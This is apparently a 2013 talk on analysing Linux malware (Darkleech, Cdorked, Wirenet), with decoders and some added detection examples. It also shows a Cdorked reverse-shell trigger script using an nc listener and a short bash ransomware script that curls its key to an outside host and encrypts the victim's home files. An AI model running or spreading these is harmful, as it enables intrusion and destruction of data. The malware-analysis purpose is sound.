malwaremoutane.net/rmll2013/day_1/linux_malware.pdf · linux malware presentation @r00tbsd – paul...


Page 1: Malwaremoutane.net/RMLL2013/day_1/linux_malware.pdf · Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu Darkleech/Chapro Analysis – Reversing xor_decrypt_string

Linux malware presentation

@r00tbsd – Paul Rascagnères from Malware.lu

Malware.lu

July 2013


Page 2

Plan

- Presentation

- Darkleech/Chapro

- Cdorked

- Wirenet

- Conclusion

Page 3

Presentation

Who am I?

- Paul Rascagnères, @r00tbsd or @malware.lu
- Creator and maintainer of malware.lu
- Malware analysis, incident response, reverse engineering...
- Author of “Malware – Identification, analyse et éradication”

Page 4

Presentation

Why am I here and why this talk? Some people think that malware does not exist on the Linux platform.

4 examples in 2012/2013:

- Darkleech (Apache module)
- Cdorked (Apache server)
- Wirenet (Remote Administration Tool)
- Gift...


Page 6

Darkleech/Chapro

First seen
The first version was identified in August 2012.

How does it work?
This malware is an Apache module. It is loaded by a LoadModule directive declared in the module configuration file.

Features:

- inject JavaScript code to redirect users to an infected website
- backdoor

Page 7

Darkleech/Chapro

Analysis – module

Module file name: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so
Example: mod_sec2_config.so

Module execution:

    $ cat /etc/apache2/modules/[VARIOUS].conf
    LoadModule sec2_config_module modules/mod_sec2_config.so

Analysis – Symptoms
The malware injects Exploit Kits (JS) on the Web pages:
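An added example (Python 3, not from the talk) that applies the file-name pattern above to an Apache configuration as a triage check; the configuration excerpt and the known-good module set are constructed. Legitimate modules such as mod_proxy_http.so also match the pattern, so the check is only useful paired with the list of modules your distribution actually ships.

```python
import re

# Module file-name pattern from the talk: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so
DARKLEECH_NAME_RE = re.compile(r"^mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so$")
LOADMODULE_RE = re.compile(r"^\s*LoadModule\s+(\S+)\s+(\S+)")

# Constructed allowlist. In practice build it from the package manager
# (dpkg -L apache2 / rpm -ql httpd) rather than hard-coding it here.
KNOWN_GOOD = {"mod_ssl.so", "mod_proxy_http.so", "mod_rewrite.so", "mod_security2.so"}

# Constructed configuration excerpt, not a real capture.
SAMPLE_CONF = """
LoadModule ssl_module modules/mod_ssl.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule sec2_config_module modules/mod_sec2_config.so
# LoadModule old_cache_module modules/mod_old_cache.so
"""


def suspicious_loadmodules(conf_text, known_good=KNOWN_GOOD):
    """Return (module_name, file_name) for every LoadModule directive whose
    shared object matches the Darkleech naming pattern and is not a module
    the distribution is known to ship."""
    hits = []
    for line in conf_text.splitlines():
        m = LOADMODULE_RE.match(line)
        if not m:
            continue  # comments, blank lines and other directives
        name, path = m.groups()
        filename = path.rsplit("/", 1)[-1]
        if DARKLEECH_NAME_RE.match(filename) and filename not in known_good:
            hits.append((name, filename))
    return hits


if __name__ == "__main__":
    for name, filename in suspicious_loadmodules(SAMPLE_CONF):
        print("suspicious module: %s (%s)" % (name, filename))
```

Without the allowlist the pattern alone also flags mod_proxy_http.so, which is the false positive the lead-in warns about.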

Page 8

Darkleech/Chapro

Analysis - Symptoms

Page 9

Darkleech/Chapro

Analysis – Symptoms
The redirection is performed by a JavaScript insertion (IFrame):

Page 10

Darkleech/Chapro

Analysis – Targets selection
The target selection is performed thanks to the Referer. The module also embeds a User-Agent ban list (C_ARRAY_BAN_USERAGENT):

SAFARI, YANDEX, OPERA, CRAWLER, FIREFOX, JIKE, CHROME, SPIDER, GOOGLEBOT, ROBOT, SLURP, PAPERLIBOT, YAHOO, SNAPPREVIEWBOT, BING, BUFFERBOT, LINUX, MEDIAPARTNERS, OPENBSD, HATENA, MACINTOSH, BLUEDRAGON, MAC OS, WORDPRESS, IPHONE, XIANGUO, ...

Note that the list covers crawlers as well as every major non-IE browser and non-Windows platform.

Page 11

Darkleech/Chapro

Analysis – Reversing
The data are encoded in the file:

Page 12

Darkleech/Chapro

Analysis – Reversing
Several functions (symbols) are linked to the encoding:

- 0x17C8 xor_decrypt_string
- 0x17ED xor_encrypt_string
- 0x1800 xor_encrypt

Page 13

Darkleech/Chapro

Analysis – Reversing
xor_decrypt_string pseudo-C (decompiler output):

    xor_decrypt_string(A8, Ac, A10, A14)
    {
        L00003117();
        ebx = ebx + 0x5001;
        esp = esp - 0xc;
        Vfffffff4 = A14 + 1;
        *esp = *( *( *( *(ebx + -300)) + 0xc));
        *(ebp - 0x10) = L00002D90();
        if(A14 > 0) {
            ecx = 0;
            do {
                edx = 0;
                eax = 0;
                edx = 0 >> 0x1f;
                Ac = Ac / Ac;
                al = *A10 & 0xff ^ *(Ac % Ac + A8);
                *( *(ebp - 0x10)) = al;
            } while(1 != A14);
        }
        esi = *(ebp - 0x10);
        *(esi + A14) = 0;
        eax = esi;
        esp = esp + 0xc;
    }

Reading past the decompiler noise: each byte of the encoded buffer (A10, length A14) is XORed with the key byte at A8[i % Ac] (Ac being the key length), written to a freshly allocated buffer, and the result is NUL-terminated.

Page 14

Darkleech/Chapro

Analysis – Reversing
xor_decrypt_string Python implementation (Python 2):

    import sys
    from itertools import izip, cycle

    fd = open(sys.argv[1], 'rb')
    fd.seek(0x84a0)          # offset of the XOR key in the module
    key = fd.read(23)        # 23-byte key

    # tab: list of {'name', 'offset', 'size'} entries for the encoded strings
    # (built from the symbols; not shown on the slide)
    for s in tab:
        fd.seek(s['offset'])
        data = fd.read(s['size'])
        decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key)))
        clear_text = decrypted.split('\x00')[0]
        print('%s: %s' % (s['name'], clear_text))

Page 15

Darkleech/Chapro

Analysis – Reversing

    $ python sec2.py "./mod_sec2_config.so"
    C_MODULE_VERSION: "2012.12.14"
    C_CC_HOST: "217.23.13.6"
    C_CC_URI: "/Home/index.php"
    C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1"
    Host: "%s"
    Content-Type: "application/x-www-form-urlencoded"
    Content-Length:" %i %s"
    C_MARKER_LEFT: "{{{"
    C_MARKER_RIGHT: "}}}"
    C_TMP_DIR: "/"
    C_LIST_PREF: "sess_"
    C_COOKIE_NAME: "PHP_SESSION_ID="
    C_ARRAY_TAGS_FOR_INJECT: "</script> </style> </head> </title>..."


Page 17

Cdorked

Presentation
Unlike its brother Darkleech/Chapro, Cdorked is not an Apache module but a custom Apache server binary. The malware uses XOR to encrypt its strings (decoder in Python 2):

    import sys
    from itertools import izip, cycle

    fd = open(sys.argv[1], 'rb')
    fd.seek(0x16B460)        # XOR key
    key = fd.read(24)

    # tab: list of {'offset', 'size'} entries for the encoded strings (not shown on the slide)
    for i, s in enumerate(tab):
        fd.seek(s['offset'])
        data = fd.read(s['size'])
        decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key)))
        print('xx%s: %s' % (i, decrypted))

Page 18

Cdorked

How to get a shell? – request

Page 19

Cdorked

How to get a shell? – encryption

Page 20

Cdorked

How to get a shell? – encryption

Here is the code (the key is derived from the client IP):

    ip = $client_ip
    key[0] = ( (ip AND 0xFF000000) >> 24 ) + 5
    key[1] = ( (ip AND 0xFF0000  ) >> 16 ) + 33
    key[2] = ( (ip AND 0xFF00    ) >> 8  ) + 55
    key[3] = ( (ip                )      ) + 78

Page 21

Cdorked

How to get a shell? – the reverse-shell (Python 2)

    import urllib2
    import subprocess
    import os

    LHOST = '192.168.56.1'
    LPORT = '4444'

    RHOST = '192.168.56.101'
    RPORT = '80'

    # command hex-encoded in the query string of a favicon.iso request
    param = ('GET_BACK;%s;%s' % (LHOST, LPORT)).encode('hex')
    request = 'http://%s:%s/favicon.iso?%s' % (RHOST, RPORT, param)

    if os.fork():
        req = urllib2.Request(request)
        req.add_header('X-Real-IP', '251.223.201.178')   # IP used for the key derivation
        urllib2.urlopen(req)
    else:
        subprocess.call(['nc', '-l', LPORT])              # listener for the shell
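An added example (Python 3, not from the talk) of the detection side of the trigger above: it classifies request records as a reverse proxy or network sensor in front of the web server would see them, flagging favicon.iso requests whose query is hex and, where present, decoding the GET_BACK command and the X-Real-IP header. The request records are constructed.

```python
import binascii
import re
from urllib.parse import urlsplit

# Constructed request records (path + headers); not real captures.
SAMPLE_REQUESTS = [
    {"path": "/favicon.ico", "headers": {"User-Agent": "Mozilla/5.0"}},
    {"path": "/favicon.iso?" + binascii.hexlify(b"GET_BACK;192.168.56.1;4444").decode(),
     "headers": {"X-Real-IP": "251.223.201.178"}},
    {"path": "/favicon.iso?deadbeef", "headers": {}},
    {"path": "/index.php?id=4", "headers": {"X-Real-IP": "10.0.0.7"}},
]

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")


def classify_request(path, headers):
    """Return None for an ordinary request, else a dict saying why it matches the
    Cdorked trigger shown in the talk (favicon.iso path with a hex-encoded query)."""
    parts = urlsplit(path)
    if not parts.path.endswith("/favicon.iso"):
        return None
    hit = {"path": parts.path, "x_real_ip": headers.get("X-Real-IP"),
           "reason": "favicon.iso request", "command": None}
    q = parts.query
    if q and len(q) % 2 == 0 and HEX_RE.match(q):
        decoded = binascii.unhexlify(q)
        if decoded.startswith(b"GET_BACK;"):
            # GET_BACK;<host>;<port>: the operator's listener, worth alerting on
            fields = decoded.decode("ascii", "replace").split(";")
            hit["reason"] = "GET_BACK reverse-shell command"
            hit["command"] = {"host": fields[1], "port": fields[2]} if len(fields) >= 3 else {}
        else:
            hit["reason"] = "hex-encoded query on favicon.iso"
    return hit


def scan(requests):
    """Run classify_request over a batch of records and keep only the matches."""
    return [h for h in (classify_request(r["path"], r["headers"]) for r in requests) if h]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```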


Page 23

Wirenet

Strings obfuscation
The attacker used the RC4 algorithm to encrypt the configuration:

Page 24

Wirenet

Strings obfuscation (decoder in Python 2, PyCrypto)

    import sys
    from Crypto.Cipher import ARC4

    fp = open(sys.argv[1])
    fp.seek(0xf4d8, 0)       # offset of the 16-byte RC4 key in the sample
    key = fp.read(16)

    # crypted: list of {'name', 'adr', 'len'} entries; options: {flag name: bit};
    # isOption(): bit test on BoolSettingsByte (all defined earlier in the script, not shown)
    for c in crypted:
        rc4 = ARC4.new(key)  # fresh cipher for every string
        fp.seek(c['adr'])
        data = fp.read(c['len'])
        val = rc4.decrypt(data).split('\x00')[0]
        print "%s: %s" % (c['name'], val)

        if c['name'] == 'BoolSettingsByte':
            for name, o in options.iteritems():
                print "%s: %s" % (name, isOption(val, o))
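An added example (Python 3, not the talk's script) that reproduces the decoding without PyCrypto: a from-scratch RC4 and the per-field decryption loop, run on a constructed key and configuration blob. It also shows why the slide's script calls ARC4.new(key) inside the loop: reusing one keystream across fields garbles every field after the first.

```python
def rc4_keystream(key):
    """RC4 key scheduling followed by the keystream generator."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key, data):
    """Encrypt/decrypt data with a fresh RC4 keystream (RC4 is symmetric)."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


# Constructed 16-byte key and NUL-padded config fields; not the real sample's values.
KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
FIELDS = [("ConnectionString", b"192.0.2.10:4141\x00\x00"), ("HostId", b"LINUX\x00\x00\x00")]
LAYOUT = [(name, len(value)) for name, value in FIELDS]
# Each field is encrypted with its own fresh keystream, as the malware does.
BLOB = b"".join(rc4(KEY, value) for _, value in FIELDS)


def decrypt_fields(blob, key, layout, fresh_cipher=True):
    """Decrypt consecutive fixed-size fields and cut each at its first NUL.
    fresh_cipher=True mirrors ARC4.new(key) inside the loop; False reuses one
    keystream across fields and yields garbage from the second field on."""
    out, offset, stream = {}, 0, rc4_keystream(key)
    for name, size in layout:
        chunk = blob[offset:offset + size]
        plain = rc4(key, chunk) if fresh_cipher else bytes(b ^ next(stream) for b in chunk)
        out[name] = plain.split(b"\x00")[0].decode("latin-1")
        offset += size
    return out


if __name__ == "__main__":
    print(decrypt_fields(BLOB, KEY, LAYOUT))
    print(decrypt_fields(BLOB, KEY, LAYOUT, fresh_cipher=False))
```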

Page 25

Wirenet

Strings obfuscation

    y0ug@laptop:~$ python decode.py 9a0e765eecc5433af3dc726206ecc56e
    ConnectionString: 212.7.208.65:4141;
    ProxyString: -
    Password: sm0k4s523syst3m523
    HostId: LINUX
    MutexName: vJEewiWD
    InstallPath: %home%/WIFIADAPT
    StartupKeyName1: WIFIADAPTER
    StartupKeyName2: -
    KeyLoggerFileName: %Home%\.m8d.dat
    BoolSettingsByte: 237
    run_as_daemon: True
    xinit_start: False
    install_file: True
    lock_file?: True
    keylogger: True
    single_instance: True
    desktop_start: True
    ConnectionType: 001

Page 26

Wirenet

Fake C&C

    wirenet $ New session 127.0.0.1:52956
    wirenet $ session
    0 127.0.0.1:52956 LINUX rootbsd @ alien
    wirenet $ session 0
    Switch to session 0 context
    127.0.0.1:52956 $ help

    Undocumented commands:
    ======================
    EOF          cred_thunderbird  get   log_clear  mkdir  rm       shell
    cp           creds             help  log_get    mv     screen
    cred_pidgin  exit              info  ls         ps     session

Page 27

Wirenet

Fake C&C

    127.0.0.1:52956 $ info
    arch: LINUX
    name: rootbsd @ alien
    DISTRIB_ID=Ubuntu
    DISTRIB_RELEASE=12.04
    DISTRIB_CODENAME=precise
    DISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS"
    127.0.0.1:52956 $ shell
    Shell is start with /bin/sh (EOF to exit)
    id
    uid=1000(rootbsd) gid=1000(rootbsd) groups=1000(rootbsd),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare),1001(bumblebee)
    Shell is stop



Page 30

Gift

Linux is so powerful... (ransomware for free)

    #!/bin/bash
    passwd=$(openssl rand -hex 64)
    curl http://www.c-and-c.com/test?$passwd
    list=$(find $HOME -type f)
    for i in $(echo $list)
    do
        openssl aes-256-ecb -in $i -out $i.new -pass pass:$passwd
        rm $i
    done

Page 31

Conclusion